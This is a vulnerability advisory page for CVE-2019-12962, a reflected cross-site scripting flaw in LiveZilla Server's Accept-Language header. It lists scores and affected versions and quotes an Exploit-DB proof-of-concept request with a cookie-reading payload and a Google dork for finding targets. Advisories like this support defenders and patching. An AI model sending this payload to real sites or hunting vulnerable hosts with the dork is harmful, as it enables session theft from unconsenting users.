CVE-2019-12962
published 2019-06-25CVE-2019-12962: LiveZilla Server before 8.0.1.1 is vulnerable to XSS in mobile/index.php via the Accept-Language HTTP header.
PriorityP342medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
9.05%
94.6th percentile
LiveZilla Server before 8.0.1.1 is vulnerable to XSS in mobile/index.php via the Accept-Language HTTP header.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| livezilla | livezilla | < 8.0.1.1 | 8.0.1.1 |
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
exploitdb·2021-03-19·CVSS 6.1
CVE-2019-12962 [MEDIUM] LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
---
# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla
# Date: 18 Mars 2021
# Exploit Author: Clément Cruchet
# Vendor Homepage: https://www.livezilla.net
# Software Link: https://www.livezilla.net/downloads/en/
# Version: LiveZilla Server 8.0.1.0 and before
# Tested on: Windows/Linux
# CVE : CVE-2019-12962
GET /mobile/index.php HTTP/1.1
Host: chat.website.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ';alert(document.cookie)//
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecu
Nuclei
LiveZilla Server 8.0.1.0 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2019-12962 [MEDIUM] LiveZilla Server 8.0.1.0 - Cross-Site Scripting
LiveZilla Server 8.0.1.0 - Cross-Site Scripting
LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.
Template:
id: CVE-2019-12962
info:
name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting
author: Clment Cruchet
severity: medium
description: |
LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.
impact: |
Attackers can inject malicious JavaScript through the Accept-Language header, potentially stealing session cookies, credentials, or performing unauthorized actions on behalf of victims.
remediation: |
Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/49669
- https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-
No writeups or analysis indexed.
http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.htmlhttps://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.htmlhttps://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/
2019-06-25
Published